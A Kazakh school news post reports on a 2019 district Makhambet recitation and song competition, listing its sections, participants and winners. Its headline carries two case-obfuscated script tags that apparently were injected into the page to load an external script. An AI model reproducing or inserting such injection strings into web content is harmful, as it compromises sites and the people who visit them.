5-11 сынып оқушылары арасында Х аудандық Махамбет оқулары өтті<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.03.2019

Х Махамбет оқулары 3 бөлім бойынша өткізілді:

1.«Ел құтқарар ер едім»- Махамбет, Мұрат Мөңкеұлы, Шернияз Жарылғасұлы, Фариза Оңғарсынова шығармаларын жатқа оқу.

2. «Тартынбай сөйлер асылмын...» -жас дарындар конкурсы (өз шығармаларын орындау)

3. «Ұлы арман» - Махамбеттің күйлерін, Фариза Оңғарсынованың өлеңдеріне шығарылған әндерді орындаушылар конкурсы.

Аудандық Махамбет оқуларына мектебімізден 9 оқушы қатысты. 7 сынып оқушысы Гаврилов Степан, 8 сынып оқушысы Кучеров Кирилл, 11 сынып оқушысы Носкова Агата «Ел құтқарар ер едім»- Махамбет, Мұрат Мөңкеұлы, Шернияз Жарылғасұлы, Фариза Оңғарсынова шығармаларын жатқа оқу бөліміне белсене қатысты. «Тартынбай сөйлер асылмын...» -жас дарындар конкурсына 8-сынып оқушысы Калдыбаева Балауса өз шығармаларын оқып, 2 жүлделі орынға ие болды. «Ұлы арман» - Махамбеттің күйлерін, Фариза Оңғарсынованың өлеңдеріне шығарылған әндерді орындаушылар конкурсына Бижигитов Ғабиден, Воронина Евгения, Добрякова Ираида, Шкурупий Ангелина өз өнерлерін ортаға салды. 11 сынып оқушысы Жовнерович Ольга ерекше дауысымен көзге түсіп, 1 орынды иеленді. Жеңімпаздарды құттықтаймыз!!!

 

Қоғамдық пәндер ӘБ жетекшісі: Калдыбаева С.Ж.

Просмотров: 610


Пікір қосу



Деректерді қолтаңбаға қосу